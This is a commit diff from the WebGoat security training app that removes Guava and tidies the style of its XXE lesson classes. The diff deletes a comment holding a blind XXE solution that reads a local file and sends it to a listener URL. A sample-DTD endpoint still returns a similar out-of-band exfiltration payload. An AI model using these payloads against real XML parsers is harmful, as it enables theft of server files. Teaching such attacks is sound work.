Code style (#696)

* Remove Guava dependency from WebGoat

* Add Checkstyle to the project with very basic standards so we have a
style across lessons. It does not interfere with basic Intellij formatting

webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/BlindSendFileAssignment.java

@@ -1,19 +1,22 @@
 package org.owasp.webgoat.xxe;
 
-import com.google.common.base.Charsets;
-import com.google.common.io.Files;
-import lombok.SneakyThrows;
+import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AssignmentPath;
 import org.owasp.webgoat.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.MediaType;
-import org.springframework.web.bind.annotation.*;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestBody;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 
 import javax.annotation.PostConstruct;
 import java.io.File;
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.nio.file.Files;
 
 import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
 
@@ -46,8 +49,9 @@ import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
  * @version $Id: $Id
  * @since November 18, 2016
  */
+@Slf4j
 @RestController
-@AssignmentHints({"xxe.blind.hints.1","xxe.blind.hints.2","xxe.blind.hints.3","xxe.blind.hints.4","xxe.blind.hints.5"})
+@AssignmentHints({"xxe.blind.hints.1", "xxe.blind.hints.2", "xxe.blind.hints.3", "xxe.blind.hints.4", "xxe.blind.hints.5"})
 public class BlindSendFileAssignment extends AssignmentEndpoint {
 
     static final String CONTENTS = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";
@@ -57,13 +61,16 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
     private Comments comments;
 
     @PostConstruct
-    @SneakyThrows
     public void createSecretFileWithRandomContents() {
         File targetDirectory = new File(webGoatHomeDirectory, "/XXE");
         if (!targetDirectory.exists()) {
             targetDirectory.mkdir();
         }
-        Files.write(CONTENTS, new File(targetDirectory, "secret.txt"), Charsets.UTF_8);
+        try {
+            Files.writeString(new File(targetDirectory, "secret.txt").toPath(), CONTENTS, StandardCharsets.UTF_8);
+        } catch (IOException e) {
+            log.error("Unable to write 'secret.txt' to '{}", targetDirectory);
+        }
     }
 
     @PostMapping(path = "xxe/blind", consumes = MediaType.ALL_VALUE, produces = MediaType.APPLICATION_JSON_VALUE)
@@ -82,46 +89,4 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
         }
         return trackProgress(failed().build());
     }
-
-/**
-<?xml version="1.0"?>
-<!DOCTYPE comment [
-<!ENTITY % remote SYSTEM "http://localhost:9090/files/admin2/attack.dtd">
-%remote;
-]>
-<comment>  <text>test&send;</text></comment>
-**/
-    /**
-     * Solution:
-     *
-     * Create DTD:
-     *
-     * <pre>
-     *     <?xml version="1.0" encoding="UTF-8"?>
-     *     <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
-     *     <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:9090/ping?text=%file;'>">
-     *      %all;
-     * </pre>
-     *
-     * This will be reduced to:
-     *
-     * <pre>
-     *     <!ENTITY send SYSTEM 'http://localhost:9090/ping?text=[contents_file]'>
-     * </pre>
-     *
-     * Wire it all up in the xml send to the server:
-     *
-     * <pre>
-     *  <?xml version="1.0"?>
-     *  <!DOCTYPE root [
-     *  <!ENTITY % remote SYSTEM "http://localhost:9090/WebWolf/files/test.dtd">
-     *  %remote;
-     *   ]>
-     *  <user>
-     *    <username>test&send;</username>
-     *  </user>
-     *
-     * </pre>
-     *
-     */
 }

webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comments.java

@@ -24,8 +24,6 @@ package org.owasp.webgoat.xxe;
 
 import com.beust.jcommander.internal.Lists;
 import com.fasterxml.jackson.databind.ObjectMapper;
-import com.google.common.collect.EvictingQueue;
-import com.google.common.collect.Maps;
 import org.joda.time.DateTime;
 import org.joda.time.format.DateTimeFormat;
 import org.joda.time.format.DateTimeFormatter;
@@ -40,10 +38,7 @@ import javax.xml.stream.XMLInputFactory;
 import javax.xml.stream.XMLStreamReader;
 import java.io.IOException;
 import java.io.StringReader;
-import java.util.Collection;
-import java.util.Comparator;
-import java.util.Map;
-import java.util.Optional;
+import java.util.*;
 import java.util.stream.Collectors;
 
 import static java.util.Optional.empty;
@@ -62,8 +57,8 @@ public class Comments {
 
     protected static DateTimeFormatter fmt = DateTimeFormat.forPattern("yyyy-MM-dd, HH:mm:ss");
 
-    private static final Map<String, EvictingQueue<Comment>> userComments = Maps.newHashMap();
-    private static final EvictingQueue<Comment> comments = EvictingQueue.create(100);
+    private static final Map<String, List<Comment>> userComments = new HashMap<>();
+    private static final List<Comment> comments = new ArrayList<>();
 
     static {
         comments.add(new Comment("webgoat", DateTime.now().toString(fmt), "Silly cat...."));
@@ -110,7 +105,7 @@ public class Comments {
         if (visibleForAllUsers) {
             comments.add(comment);
         } else {
-            EvictingQueue<Comment> comments = userComments.getOrDefault(webSession.getUserName(), EvictingQueue.create(100));
+            List<Comment> comments = userComments.getOrDefault(webSession.getUserName(), new ArrayList<>());
             comments.add(comment);
             userComments.put(webSession.getUserName(), comments);
         }

webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java

@@ -38,8 +38,8 @@ import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
 @AssignmentHints({"xxe.hints.content.type.xxe.1", "xxe.hints.content.type.xxe.2"})
 public class ContentTypeAssignment extends AssignmentEndpoint {
 
-    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"}; 
-    private final static String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};
+    private static final String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
+    private static final String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};
 
     @Value("${webgoat.server.directory}")
     private String webGoatHomeDirectory;

webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Ping.java

@@ -33,18 +33,13 @@ import java.io.FileNotFoundException;
 import java.io.PrintWriter;
 
 @Slf4j
-public class Ping  {
+public class Ping {
 
     @Value("${webgoat.user.directory}")
     private String webGoatHomeDirectory;
     @Autowired
     private WebSession webSession;
 
-//    @Override
-//    public String getPath() {
-//        return "XXE/ping";
-//    }
-
     @RequestMapping(method = RequestMethod.GET)
     @ResponseBody
     public String logRequest(@RequestHeader("User-Agent") String userAgent, @RequestParam(required = false) String text) {

webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java

@@ -48,16 +48,16 @@ import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
 @AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4", "xxe.hints.simple.xxe.5", "xxe.hints.simple.xxe.6"})
 public class SimpleXXE extends AssignmentEndpoint {
 
-    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
-    private final static String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};
+    private static final String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
+    private static final String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};
 
     @Value("${webgoat.server.directory}")
     private String webGoatHomeDirectory;
-    
+
     @Value("${webwolf.url.landingpage}")
     private String webWolfURL;
-    
-    
+
+
     @Autowired
     private Comments comments;
 
@@ -85,20 +85,20 @@ public class SimpleXXE extends AssignmentEndpoint {
         }
         return success;
     }
-    
-    @RequestMapping(path="/xxe/tmpdir",consumes = ALL_VALUE, produces=MediaType.TEXT_PLAIN_VALUE)
+
+    @RequestMapping(path = "/xxe/tmpdir", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
     @ResponseBody
     public String getWebGoatHomeDirectory() {
-    	return webGoatHomeDirectory;
+        return webGoatHomeDirectory;
     }
-    
-    @RequestMapping(path="/xxe/sampledtd",consumes = ALL_VALUE, produces=MediaType.TEXT_PLAIN_VALUE)
+
+    @RequestMapping(path = "/xxe/sampledtd", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
     @ResponseBody
     public String getSampleDTDFile() {
-    	return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + 
-    			"<!ENTITY % file SYSTEM \"file:replace-this-by-webgoat-temp-directory/XXE/secret.txt\">\n" + 
-    			"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>\">\n" + 
-    			"%all;";
+        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
+                + "<!ENTITY % file SYSTEM \"file:replace-this-by-webgoat-temp-directory/XXE/secret.txt\">\n"
+                + "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>\">\n"
+                + "%all;";
     }
-    
+
 }